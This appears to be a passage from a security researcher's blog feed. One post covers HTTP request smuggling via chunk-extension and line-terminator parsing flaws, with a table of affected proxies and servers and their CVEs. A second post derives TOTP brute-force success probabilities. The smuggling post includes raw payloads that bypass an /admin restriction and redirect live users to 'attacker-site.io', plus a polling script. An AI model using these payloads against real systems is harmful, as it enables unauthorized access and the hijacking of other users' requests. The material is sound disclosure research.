2;<span class="http-line-break">\n</span>
xx<span class="http-line-break">\r\n</span>
3f<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span> 
<span class="http-line-break">\r\n</span>
GET /admin HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Content-Length: 40<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span></span><span class="http-highlight http-highlight-two">GET / HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span></span></code></pre>
<p style="text-align: center; font-weight: bold;">Proxy interpretation</p>
</div>

<div style="flex: 1;">
<pre><code><span class="http-highlight http-highlight-one">GET / HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
2;<span class="http-line-break">\n</span>
xx<span class="http-line-break">\r\n</span>
3f<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span> 
<span class="http-line-break">\r\n</span></span><span class="http-highlight http-highlight-two">GET /admin HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Content-Length: 40<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
GET / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span></span></code></pre>
<p style="text-align: center; font-weight: bold;">Server interpretation</p>
</div>
</div>
</div>

<p>From the proxy’s perspective, it is now receiving two pipelined requests, so it will happily return two responses. However, what the proxy considers to be the second pipelined request is in fact interpreted as the body of the smuggled request on the back-end. As such, we will obtain the response to the <code class="language-plaintext highlighter-rouge">GET /admin</code> request in the second response.</p>

<p>An important caveat here is that the payload above will not work if the front-end decides to forward the requests over two separate back-end connections. In this situation, we can obtain the response by instead issuing a series of <code class="language-plaintext highlighter-rouge">GET /</code> follow-up requests after delivering the payload. One of these should eventually be routed through the same connection as the payload and consequently be served the response to the smuggled request. Of course, this carries with it the risk of another client reaching the poisoned socket first. Incidentally, that is what we will deliberately exploit in the next section.</p>
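<p>The follow-up technique can be sketched with a plain HTTP client. This is purely illustrative (the status-code check is a placeholder heuristic, and the anomaly criterion depends entirely on the target), but it shows the shape of the approach: keep issuing benign requests until one of them is answered with the smuggled response.</p>

```python
import http.client

def poll_for_smuggled_response(host: str, attempts: int = 20):
    """Issue benign follow-up requests; return the first anomalous response."""
    for _ in range(attempts):
        conn = http.client.HTTPConnection(host, timeout=5)
        conn.request("GET", "/")
        resp = conn.getresponse()
        body = resp.read()
        conn.close()
        # Placeholder heuristic: the smuggled response presumably differs
        # from the normal response to GET / (status, headers or body).
        if resp.status != 200:
            return resp.status, body
    return None
```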

<h4 id="exploiting-live-users">Exploiting live users</h4>
<p>A very similar technique can be used to corrupt the requests sent by other live clients of the server. Instead of sending follow-up HTTP requests ourselves, we smuggle a request with an oversized <code class="language-plaintext highlighter-rouge">Content-Length</code> and wait for another user’s request to reach the same socket. The server will interpret the victim’s request as the body of the smuggled request, causing the victim to receive the response that the back-end server intended for us.</p>

<p>This is particularly impactful if we have a way of eliciting a harmful response from the server. For example, an otherwise unexploitable header-based open redirect can be used to redirect random live users to a site of our choosing. If, for instance, the application responds with a <code class="language-plaintext highlighter-rouge">301 Moved Permanently</code> whose <code class="language-plaintext highlighter-rouge">Location</code> header reflects the value of the <code class="language-plaintext highlighter-rouge">X-Forwarded-Host</code> request header, live users of an EXT.TERM-vulnerable application could be redirected to <code class="language-plaintext highlighter-rouge">attacker-site.io</code> using the payload below.</p>

<div style="max-width: 100%; overflow-x: auto;">
<pre><code>GET / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
5f;<span class="http-line-break">\n</span>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
GET / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
X-Forwarded-Host: attacker-site.io<span class="http-line-break">\r\n</span>
Content-Length: 100<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</code></pre>
</div>

<p>Once the front-end forwards another request over the same back-end connection, the server will interpret it as the body of the smuggled request and respond accordingly, leading to the victim being served the malicious redirect. On the back-end, the request looks as shown below.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px">
<div style="flex: 1;">
<pre><code>GET / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
X-Forwarded-Host: attacker-site.io<span class="http-line-break">\r\n</span>
Content-Length: 100<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-two">GET /some/path HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text">victim's request</span>
Host: localhost<span class="http-line-break">\r\n</span>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...<span class="http-line-break">\r\n</span>
...</span></code></pre>
</div>
</div>
</div>

<p>Such prefixing-based techniques can be adapted in a large variety of ways to mount devastating attacks against live clients with zero user interaction. As these exploitation techniques are not unique to the kinds of request smuggling vulnerabilities we have introduced in this article, I will not discuss them at length here. For a more comprehensive review of such attacks, I recommend the PortSwigger Web Security Academy’s <a href="https://portswigger.net/web-security/request-smuggling/exploiting">article</a> on the topic.</p>

<h3 id="whos-vulnerable">Who’s vulnerable?</h3>
<p>Having developed these techniques, I set out to find vulnerable proxies and servers. In this endeavor, the amazing <a href="https://github.com/narfindustries/http-garden">HTTP Garden</a> project created by Ben Kallus and Prashant Anantharaman proved immensely valuable for quickly identifying chunk parsing inconsistencies across a wide range of HTTP implementations.</p>

<p>Running the black-box probes against a range of bug bounty targets also revealed several instances of real-world request smuggling vulnerabilities that had been overlooked for years. In fact, the EXT.TERM variant was entirely theoretical at the time I developed these probes – the only vulnerable front-end I discovered was a closed-source product identified using a probe against a live target.</p>

<p>Let’s take a look at the affected systems.</p>

<h4 id="termext-and-extterm-vulnerabilities">TERM.EXT and EXT.TERM vulnerabilities</h4>
<p>First, a brief reminder: In TERM.EXT and EXT.TERM vulnerabilities, the parsing discrepancy is introduced by a <code class="language-plaintext highlighter-rouge">\n</code> (or another sequence) in a chunk extension. Some parsers will interpret this as a line terminator and others will interpret it as part of the chunk extension, both of which are technically incorrect behaviors.</p>
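<p>To make the flaw concrete, here is a sketch of what strict chunk-size-line parsing looks like. This is a simplified reading of the RFC 9112 grammar (quoted-string extension values are omitted for brevity, and the regex is my own illustration, not any particular server’s code). The point is that a strict parser rejects a bare <code class="language-plaintext highlighter-rouge">\n</code> outright instead of guessing at its meaning.</p>

```python
import re

# chunk-size *( ";" ext-name [ "=" ext-value ] ) CRLF, simplified:
# hex digits, optional token-based extensions, and a mandatory literal \r\n.
CHUNK_SIZE_LINE = re.compile(
    rb"\A([0-9A-Fa-f]+)"                      # chunk-size
    rb"(?:;[!#$%&'*+.^_`|~0-9A-Za-z-]+"       # ext-name (token)
    rb"(?:=[!#$%&'*+.^_`|~0-9A-Za-z-]+)?)*"   # optional ext-value (token)
    rb"\r\n\Z"                                # CRLF only -- never a bare \n
)

def parse_chunk_size_line(line: bytes) -> int:
    m = CHUNK_SIZE_LINE.match(line)
    if m is None:
        raise ValueError("malformed chunk-size line")
    return int(m.group(1), 16)
```

<p>A parser like this accepts <code class="language-plaintext highlighter-rouge">2;name=value\r\n</code> but rejects <code class="language-plaintext highlighter-rouge">2;\n</code>, removing the ambiguity that TERM and EXT parsers resolve in opposite directions.</p>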

<p>Interpreting newlines as line terminators turned out to be a <em>very</em> common flaw in both web servers and proxies. In practice, the limiting factor for exploitation is normalization, which renders the attack impossible in most cases. However, I did manage to discover three well-known vulnerable proxies that do not apply any line terminator normalization in the chunked body. Vulnerable servers are more common, since they (unlike proxies) cannot protect themselves by normalizing requests.</p>

<p>I’ve listed my discoveries in the table below. For more information about the resolution of each vulnerability, <strong>hover your mouse over the cell elements</strong>.</p>

<table>
  <colgroup>
    <col style="width: 15%" />
    <col style="width: 49%" />
    <col style="width: 41%" />
  </colgroup>
  <thead>
    <tr>
      <th></th>
      <th>TERM.EXT</th>
      <th>EXT.TERM</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <th>Proxies</th>
      <td>
        <span class="tooltip">
          1. Apache Traffic Server
          <span class="tooltiptext">Assigned CVE-2024-53868.</span>
        </span><br />
        <span class="tooltip">
          2. Google Classic Application Load Balancer
          <span class="tooltiptext">Awarded a $15,000 bounty by the Google VRP.</span>
        </span>
      </td>
      <td>
        <span class="tooltip">
          1. Imperva CDN
          <span class="tooltiptext">Awarded a $600 bounty.</span>
        </span>
      </td>
    </tr>
    <tr>
      <th>Servers</th>
        <td>
          <span class="tooltip">
            1. AIOHTTP
            <span class="tooltiptext">Assigned CVE-2024-52304.</span>
          </span><br />
          <span class="tooltip">
            2. fasthttp
            <span class="tooltiptext">Fixed in <a href="https://github.com/valyala/fasthttp/pull/1899" target="_blank"><code style="white-space: nowrap">PR #1899</code></a>.</span>
          </span><br />
          <span class="tooltip">
            3. Gunicorn
            <span class="tooltiptext">Known issue. Fix pending, see <a href="https://github.com/benoitc/gunicorn/pull/3327" target="_blank"><code style="white-space: nowrap">PR #3327</code></a>.</span>
          </span>
        </td>
        <td>
          <span class="tooltip">
            1. nginx
            <span class="tooltiptext">Decided not to fix.</span>
          </span><br />
          <span class="tooltip">
            2. Eclipse Jetty
            <span class="tooltiptext">Fixed in <a href="https://github.com/jetty/jetty.project/pull/12564" target="_blank"><code style="white-space: nowrap">PR #12564</code></a>.</span>
          </span><br />
          <span class="tooltip">
            3. Eclipse Grizzly
            <span class="tooltiptext">Fixed in <a href="https://github.com/eclipse-ee4j/grizzly/pull/2220" target="_blank"><code style="white-space: nowrap">PR #2220</code></a> (off by default).</span>
          </span><br />
          <span class="tooltip">
            4. netty
            <span class="tooltiptext">Fixed in <a href="https://github.com/netty/netty/pull/15611" target="_blank"><code style="white-space: nowrap">PR #15611</code></a>.</span>
          </span><br />
          <span class="tooltip">
            5. H2O
            <span class="tooltiptext">Fixed in <a href="https://github.com/h2o/picohttpparser/pull/82" target="_blank"><code style="white-space: nowrap">PR #82</code></a>.</span>
          </span><br />
          <span class="tooltip">
            6. Golang net/http
            <span class="tooltiptext">Assigned CVE-2025-22871 and awarded a $5,000 bounty by the Google VRP.</span>
          </span>
        </td>
    </tr>
  </tbody>
</table>

<p>Any combination of one of these proxies coupled with one of the servers in the same column would result in a vulnerability. As an example, here’s a TERM.EXT proof-of-concept attacking an AIOHTTP application behind a Google Cloud Classic Application Load Balancer.</p>

<script src="https://asciinema.org/a/tkF6XXyKTUVuZICZOesYBBbez.js" id="asciicast-tkF6XXyKTUVuZICZOesYBBbez" async="true"></script>

<p>The payload in the video smuggles a <code class="language-plaintext highlighter-rouge">POST /admin</code> request with an oversized <code class="language-plaintext highlighter-rouge">Content-Length</code> header past the load balancer (which is configured to reject requests to <code class="language-plaintext highlighter-rouge">/admin</code>). After a few repeated requests, the response to the smuggled request is served.</p>

<h4 id="termspill-and-spillterm-vulnerabilities">TERM.SPILL and SPILL.TERM vulnerabilities</h4>
<p>For TERM.SPILL and SPILL.TERM vulnerabilities to arise, there must be a discrepancy in the line terminator parsing of the chunk body. Additionally, either the server or the proxy must accept oversized chunks.</p>

<p>Judging by the results of my own experimentation, TERM.SPILL and SPILL.TERM vulnerabilities are not quite as common as their TERM.EXT and EXT.TERM counterparts. Despite my efforts, I was unable to find a single proxy vulnerable to TERM.SPILL, which therefore remains a completely theoretical vulnerability for now. However, I did discover a few setups vulnerable to the SPILL.TERM variant.</p>

<table>
  <colgroup>
    <col style="width: 15%" />
    <col style="width: 30%" />
    <col style="width: 55%" />
  </colgroup>
  <thead>
    <tr>
      <th></th>
      <th>TERM.SPILL</th>
      <th>SPILL.TERM</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <th>Proxies</th>
      <td>
        <span class="tooltip">
          <i>None</i>
          <span class="tooltiptext">No TERM.SPILL-vulnerable proxies were found.</span>
        </span>
      </td>
      <td>
        <span class="tooltip">
          1. Google Classic Application Load Balancer
          <span class="tooltiptext">Assigned CVE-2025-4600 and awarded a $15,000 bounty by the Google VRP.</span>
        </span><br />
        <span class="tooltip">
          2. pound
          <span class="tooltiptext">Fixed in <a href="https://github.com/graygnuorg/pound/pull/43" target="_blank"><code style="white-space: nowrap">PR #43</code></a>.</span>
        </span>
      </td>
    </tr>
    <tr>
      <th>Servers</th>
        <td>
          <span class="tooltip">
            1. netty<br />
            2. Eclipse Grizzly<br />
            3. undertow
            <span class="tooltiptext">These servers accept spills. This is non-exploitable unless a vulnerable proxy exists.</span>
          </span><br />
        </td>
        <td>
          <span class="tooltip">
            1. uvicorn and hypercorn (<a href="https://github.com/python-hyper/h11" target="_blank">h11</a> dependency)
            <span class="tooltiptext">Assigned CVE-2025-43859.</span>
          </span><br />
          <span class="tooltip">
            2. Ktor
            <span class="tooltiptext">Assigned CVE-2025-29904 and awarded a $300 bounty by JetBrains.</span>
          </span><br />
          <span class="tooltip">
            3. Eclipse Jetty
            <span class="tooltiptext">Fixed in <a href="https://github.com/jetty/jetty.project/pull/12564" target="_blank"><code style="white-space: nowrap">PR #12564</code></a>.</span>
          </span><br />
          <span class="tooltip">
            4. uHTTPd
            <span class="tooltiptext">In discussion, see <a href="https://github.com/openwrt/uhttpd/pull/4" target="_blank"><code style="white-space: nowrap">PR #4</code></a>.</span>
          </span>
        </td>
    </tr>
  </tbody>
</table>

<p>Although categorized together, the parsing flaws in the table above are not exactly identical. Specifically, Ktor interpreted <code class="language-plaintext highlighter-rouge">\r</code> as a line terminator whereas h11 and uHTTPd accepted any 2-byte sequence. Jetty treated the CRLF as optional, effectively interpreting an empty string as a line terminator. On the proxy side, there is a nuance as well: pound did not allow <code class="language-plaintext highlighter-rouge">\r</code> in the spill. This means that pound-Ktor is notably <em>not</em> a vulnerable setup.</p>

<h3 id="closing-thoughts">Closing thoughts</h3>
<p>One thing that became clear to me during my discussions with various vendors and maintainers is that HTTP servers <em>really</em> care about robustness. Many were reluctant to adopt stricter parsing rules, fearing that they might break compatibility with non-compliant clients. Vulnerabilities like the ones described in this post reveal a fundamental disharmony between security and robustness: we simply cannot allow parsing leniencies without simultaneously opening the door to misinterpretations, at least a little bit.</p>

<p>While a great deal of attention has been given to request smuggling attacks based on the ambiguity of requests with both a <code class="language-plaintext highlighter-rouge">Content-Length</code> and <code class="language-plaintext highlighter-rouge">Transfer-Encoding: chunked</code> header, it seems to me that techniques based on chunked-body parsing flaws have largely been overlooked. I find it remarkable that the techniques we’ve explored in this article have remained undiscovered for so long, despite their relative simplicity. One cannot help but wonder: how many dangerous HTTP parser bugs are still out there, waiting to be found?</p>

<p><br /><br /></p>

<hr />

<p><br /><br /></p>

<p>If you have any comments or questions about this post, I’d love to hear them. Seriously. It would be great to know if anyone actually reads this. Feel free to reach out to me on X (<a href="https://x.com/__w4ke">@__w4ke</a>) or shoot me an email at <a href="mailto:jeppe.b.weikop@gmail.com">jeppe.b.weikop@gmail.com</a>.</p>]]></content><author><name>Jeppe Bonde Weikop</name></author><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">On the bruteforceability of time-based one-time passwords</title><link href="https://w4ke.info/2025/01/26/totp-brute.html" rel="alternate" type="text/html" title="On the bruteforceability of time-based one-time passwords" /><published>2025-01-26T00:00:00+00:00</published><updated>2025-01-26T00:00:00+00:00</updated><id>https://w4ke.info/2025/01/26/totp-brute</id><content type="html" xml:base="https://w4ke.info/2025/01/26/totp-brute.html"><![CDATA[<script defer="" src="https://cdn.jsdelivr.net/npm/plotly.js-dist@2.21.0/plotly.min.js"></script>

<script defer="" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>

<script defer="" src="https://cdnjs.cloudflare.com/ajax/libs/noUiSlider/15.8.1/nouislider.min.js"></script>

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/noUiSlider/15.8.1/nouislider.css" />

<style>
#sliders {
  display: grid;
  grid-template-columns: 1fr 1fr;
  gap: 20px;
  width: 80%;
  margin: 20px auto;
}

.slider-container {
  display: flex;
  flex-direction: column;
  align-items: center;
  width: 100%;
}

.slider-label {
  margin-bottom: 5px;
  font-size: 15px;
}

.noUi-target {
  width: 90%;
  margin: 0 auto;
}
</style>

<p>It is hardly controversial to argue in 2025 that 6-digit time-based one-time passwords (TOTPs) are susceptible to brute-force attacks if not accompanied by appropriate rate-limiting countermeasures. When I recently found myself searching for a mathematical breakdown of this susceptibility, I was surprised to find that none seems to exist – only simplified descriptions that do not properly capture the subtleties of TOTPs. This lack of precision bugged me enough to do something about it.</p>

<p>What follows is my attempt to fill that gap. In this post, we’ll look into the mathematics of TOTP brute-force attacks and develop an accurate description, skipping the shortcuts. Finally, we will take some time to discuss the importance of the various TOTP configuration parameters.</p>

<h2 id="brief-introduction-to-totps">Brief introduction to TOTPs</h2>
<p>Before we dive into the math, let us first introduce TOTP and define some relevant terminology. If you’ve ever <del>been forced to enable</del> responsibly chosen to enable 2FA, you’re probably already familiar with the principle of TOTPs from apps like Google Authenticator. The basic idea is simple: the 2FA app generates a new 6-digit code every 30 seconds (each <em>“time step”</em>) using the current time and a shared secret usually provided in a QR code during 2FA setup. To prove your identity, you (the <em>“prover”</em>) submit the code and the server (the <em>“validator”</em>) independently generates the same code and verifies that they match. Codes need not be remembered, can’t be used more than once, and are all equally likely to be generated. Lovely!</p>

<p>Since the current time is used in code generation, this scheme relies on the prover and validator staying reasonably time-synchronized. To account for potential clock drift and network latency, TOTP validators can choose to accept a number of the most recently expired codes (<em>“grace period codes”</em>) in addition to the correct code (the “<em>primary code”</em>). This optional grace period is intended to ensure that valid authentication attempts aren’t unfairly rejected due to minor synchronization issues.</p>
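<p>For concreteness, here is a minimal sketch of RFC 6238 code generation together with a grace-period-aware validator (SHA-1 and 6 digits, as in common deployments; the function names and the <code class="language-plaintext highlighter-rouge">lam</code> parameter are my own):</p>

```python
import hashlib
import hmac
import struct

def totp(secret: bytes, unix_time: float, digits: int = 6, step: int = 30) -> str:
    """Generate the TOTP code for the time step containing unix_time."""
    counter = int(unix_time // step)
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                      # dynamic truncation (RFC 4226)
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10**digits).zfill(digits)

def verify(secret: bytes, code: str, unix_time: float, lam: int = 0,
           digits: int = 6, step: int = 30) -> bool:
    """Accept the primary code plus the last `lam` grace period codes."""
    return any(totp(secret, unix_time - i * step, digits, step) == code
               for i in range(lam + 1))
```

<p>With <code class="language-plaintext highlighter-rouge">lam = 0</code>, only the primary code is accepted; each increment widens the window by one expired code.</p>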

<p>There are, then, three configuration parameters of interest for our brute-force analysis: the number of OTP digits \(D\), the time step duration \(L\), and the number of grace period codes \(\lambda\). We can therefore completely describe a TOTP validator’s configuration with the tuple \((D, L, \lambda)\).</p>

<p>Let us now take a look at these configuration parameters from an attacker’s perspective. First of all, we can conclude that the OTP space has a relatively small size of \(N = 10^D\). At any given time, \(1 + \lambda\) of these codes are acceptable to the validator, and during each time step, we can attempt a total of \(n = v \cdot L\) guesses, where \(v\) is our number of attempts per second.</p>

<h2 id="brute-force-mathematics">Brute-force mathematics</h2>
<p>Other authors (<a href="https://lukeplant.me.uk/blog/posts/6-digit-otp-for-two-factor-auth-is-brute-forceable-in-3-days/">Luke Plant, 2019</a> and <a href="https://pulsesecurity.co.nz/articles/totp-bruting">Michael Fincham, 2021</a>) have previously used a binomial distribution to model the probability of a successful brute-force attack against TOTP validators. This is a close approximation, but it suffers from certain inaccuracies. In this section, I will attempt to derive a more exact description.</p>

<p>First of all, I will argue that a <em>hypergeometric</em> distribution constitutes a better starting point than a binomial distribution. To see why, let us consult the <a href="https://en.wikipedia.org/wiki/Hypergeometric_distribution">Wikipedia article</a> on the subject:</p>

<blockquote>
  <p>(…) the hypergeometric distribution is a discrete probability distribution that describes the probability of  \(k\) successes (random draws for which the object drawn has a specified feature) in \(n\) draws, <strong>without</strong> replacement, from a finite population of size \(N\) that contains exactly \(K\) objects with that feature, wherein each draw is either a success or a failure. In contrast, the binomial distribution describes the probability of \(k\) successes in \(n\) draws <strong>with</strong> replacement.</p>
</blockquote>

<p>In this context, a <em>“random draw”</em> is a guess, the <em>“specified feature”</em> is the guess being a valid code, and <em>“replacement”</em> refers to whether or not we might submit the same guess multiple times. Clearly, any reasonable attacker would not repeat incorrect guesses within a single time step, as that would be guaranteed to fail. Let us therefore agree that the <em>without replacement</em> option makes more sense.</p>
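<p>A quick Monte Carlo sanity check (with a deliberately small code space for speed) confirms the without-replacement intuition: guessing \(n\) distinct codes out of \(N\), with one valid code, succeeds with probability exactly \(n/N\).</p>

```python
import random

def simulate(N: int = 1000, n: int = 50, trials: int = 20000, seed: int = 1) -> float:
    """Fraction of trials in which n distinct guesses hit the one valid code."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        valid = rng.randrange(N)
        guesses = rng.sample(range(N), n)   # distinct guesses: no replacement
        hits += valid in guesses
    return hits / trials

# the simulated frequency lands close to n/N = 0.05
```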

<h3 id="the-simplest-case-lambda--0">The simplest case: \(\lambda = 0\)</h3>
<p>Now we’re ready to consider the simple case where \(\lambda = 0\). Within each individual time step, we’ve agreed that the number of correct guesses \(X\) follows a hypergeometric distribution. Since there is no grace period and thus only one valid code, we set \(K = 1\).</p>

\[X \sim Hypergeometric(N=10^D,\ K=1,\ n=vL)\]

<p>Consequently, its <a href="https://en.wikipedia.org/wiki/Probability_mass_function">PMF</a> is given by:</p>

\[Pr(X = k) = \frac{\binom{K}{k} \binom{N-K}{n-k}}{\binom{N}{n}}\]

<p>Remember, we only need to guess correctly <em>once</em>; anything other than \(X = 0\) correct guesses is considered a success. The probability of zero correct guesses (i.e. a <em>failure</em>) simplifies nicely:</p>

\[Pr(f) = Pr(X = 0) = \frac{\binom{K}{0} \binom{N-K}{n-0}}{\binom{N}{n}} = \frac{ \binom{N-K}{n}}{\binom{N}{n}} = \frac{ \binom{10^D - 1}{v L}}{\binom{10^D}{v L}} = \frac{10^D - v L}{10^D}\]

<p>\(Pr(f)\) represents the probability of failure during a <em>single</em> time step. Now, what happens when our brute-force attack spans multiple time steps? The probability of overall failure \(Pr(F)\) is equivalent to the probability of failing every individual time step. As such, we can describe the probability of failure after a \(T\)-second attack as the probability of failing \(T / L\) consecutive time steps.</p>

\[Pr(F) = {Pr(f)}^{T/L}\]

<p>Conversely, the probability of overall success must then be:</p>

\[Pr(S) = 1 - Pr(F)\]

<p>This is a complete description of the success probability in the simple case where \(\lambda = 0\). As we’ll see in the next section, the general case is a bit more convoluted.</p>
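<p>In code, the simple-case result is a one-liner (parameter names follow the notation above; the example figures are illustrative):</p>

```python
def success_probability(D: int, L: float, v: float, T: float) -> float:
    """Pr(S) for lambda = 0: one minus the chance of failing all T/L steps."""
    N = 10 ** D
    n = v * L                        # guesses per time step
    return 1 - ((N - n) / N) ** (T / L)

# Example: 6 digits, 30-second steps, 10 guesses per second, a 3-day attack
p = success_probability(D=6, L=30, v=10, T=3 * 24 * 3600)
```

<p>With these illustrative numbers, the attack succeeds with probability roughly 0.93, consistent with the often-quoted claim that an unthrottled 6-digit TOTP can be brute-forced in a matter of days.</p>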

<h3 id="the-general-case">The general case</h3>
<p>It is tempting to conclude that in the general case where \(\lambda\) can take on a non-zero value, we can adjust our model simply by setting \(K = 1 + \lambda\). Unfortunately, it’s not quite that simple.</p>

<p>Consider what happens once we enter a new time step during our attack: a new primary code is generated, the previous one becomes a grace period code, and the oldest grace period code expires. At this point, <em>any code</em> could be valid, but not all codes are equally likely to be accepted. Specifically, our failed attempts from the previous time step might match the new primary code, but they will certainly not be accepted as grace period codes. For this reason, we should not repeat guesses from the last \(\lambda\) time steps, as they are less likely to result in a success. By applying this intuitive optimization strategy, we can slightly improve our chances of success.</p>

<p>So how do we express this improvement mathematically? Instead of considering \(1 + \lambda\) codes to be valid simultaneously, we consider the probability of guessing each valid code individually. For each grace period code, we’ve effectively reduced the size of the OTP search space by \(n = v L\) guesses for each time step in which the code has been active. As such, we can express \(Pr(f)\) as a product of \(\lambda + 1\) differently parameterized hypergeometric probabilities. We introduce \(N_i = N - i v L\) to denote the size of the reduced search space for a code that has been active for \(i\) time steps.</p>

\[\begin{aligned}
Pr(f) &amp;=  Pr(X = 0 ; N_0) \cdot Pr(X = 0 ; N_1) \cdots Pr(X = 0 ; N_{\lambda}) \\
      &amp;= \prod_{i=0}^{\lambda}{Pr(X = 0 ; N_i)}
\end{aligned}\]

<p>Of course, this expression is only valid once the attack has been ongoing for at least \(\lambda\) time steps. Before that, we have not yet ruled out enough codes through incorrect guesses, and we therefore cannot reap the full benefit of a reduced search space. For simplicity, we will ignore this <em>“slow start”</em>, as its effect is negligible and accounting for it would needlessly complicate the notation.</p>
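<p>In code, the product above is just a short loop. Here's a minimal sketch (the function name is my own; the interactive graph below is built on the same idea):</p>

```javascript
// Per-step failure probability Pr(f) in the general case:
// the product of Pr(X = 0; N_i) over the primary code (i = 0)
// and the lambda grace period codes (i = 1..lambda)
function perStepFailure(D, v, L, lambda) {
    const N = 10 ** D;    // full OTP search space
    const vL = v * L;     // guesses spent per time step
    let prFail = 1;
    for (let i = 0; i <= lambda; i++) {
        const Ni = N - i * vL;     // reduced search space N_i
        if (vL >= Ni) return 0;    // whole space covered: we cannot fail
        prFail *= 1 - vL / Ni;     // Pr(X = 0; N_i) = (N_i - vL) / N_i
    }
    return prFail;
}

// With lambda = 0 this reduces to the simple case's (10^D - vL) / 10^D:
// perStepFailure(6, 10, 30, 0) is approximately 0.9997
```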

<p>As in the simple case, the probability of failure (and success) after \(T\) seconds can be expressed as:</p>

\[Pr(F) = {Pr(f)}^{T/L}\]

\[Pr(S) = 1 - Pr(F)\]

<p>At last! We have obtained an expression for the probability of a successful brute-force attack within \(T\) seconds with \(v\) attempts per second against a TOTP validator with configuration \((D, L, \lambda)\).</p>

<h2 id="lets-see-some-results">Let’s see some results</h2>
<p>Now that we have related the attack duration to the probability of success, let’s see what kind of results we get when we plug in some parameter values. I’ve included an interactive graph below for you to play with the various parameters and see how they affect the time required for a probable compromise.</p>

<div id="plot"></div>
<div id="sliders">
<div class="slider-container">
    <div class="slider-label">\(v\) (attempts per second): <span id="v-label">1</span></div>
    <div id="v-slider"></div>
</div>
<div class="slider-container">
    <div class="slider-label">\(L\) (time step duration): <span id="L-label">30</span> seconds</div>
    <div id="L-slider"></div>
</div>
<div class="slider-container">
    <div class="slider-label">\(\lambda\) (grace period parameter): <span id="lambda-label">1</span></div>
    <div id="lambda-slider"></div>
</div>
<div class="slider-container">
    <div class="slider-label">\(D\) (number of digits): <span id="D-label">6</span></div>
    <div id="D-slider"></div>
</div>
</div>

<script>
let D = 6;
let v = 10;
let L = 30;
let lambda = 1;

// Probability of a successful brute-force attack within T seconds
function probByTime(T) {
    if (T == 0) return 0;

    let otpSpaceSize = 10 ** D;   // N = 10^D possible codes
    let vL = v * L;               // guesses per time step

    // per-step failure probability: the product of Pr(X = 0; N_i)
    // over the primary code and the lambda grace period codes
    let result = 1;

    for (let i = 0; i <= lambda; i++) {
        // search space reduced by the guesses already spent on this code
        let Ni = otpSpaceSize - i * vL;

        if (Ni <= 0 || vL > Ni) {
            // if the entire space is covered, the probability of success is 100%
            return 1;
        }

        result *= 1 - (vL / Ni);
    }

    // fail T / L consecutive time steps, then take the complement
    return 1 - Math.pow(result, T / L);
}

function distribution() {
    const x = Array.from({length: 4*3*24+1}, (_, i) => i/4);
    const y = x.map(xVal => probByTime(60*60*xVal));
    return {x, y};
}

function updatePlot() {
    const data = distribution();
    const x = data.x;
    const y = data.y;

    const trace = {
        x: x,
        y: y,
        mode: 'lines',
        type: 'scatter'
    };

    const layout = {
        title: 'Brute-force success probability over time',
        xaxis: { title: 'Time (hours)', range: [0, 3*24+2] },
        yaxis: { title: 'Probability of success', range: [0, 1.1] }
    };

    Plotly.newPlot('plot', [trace], layout);
}

const vSlider = document.getElementById('v-slider');
const LSlider = document.getElementById('L-slider');
const lambdaSlider = document.getElementById('lambda-slider');
const DSlider = document.getElementById('D-slider');

function updateLabels() {
    document.getElementById('v-label').textContent = `${v}`;
    document.getElementById('L-label').textContent = `${L}`;
    document.getElementById('lambda-label').textContent = `${lambda}`;
    document.getElementById('D-label').textContent = `${D}`;
}

document.addEventListener("DOMContentLoaded", () => {
    noUiSlider.create(vSlider, {
        start: [10],
        range: { min: 1, max: 100 },
        step: 1
    });

    noUiSlider.create(LSlider, {
        start: [30],
        range: { min: 10, max: 15*60 },
        step: 5
    });

    noUiSlider.create(lambdaSlider, {
        start: [1],
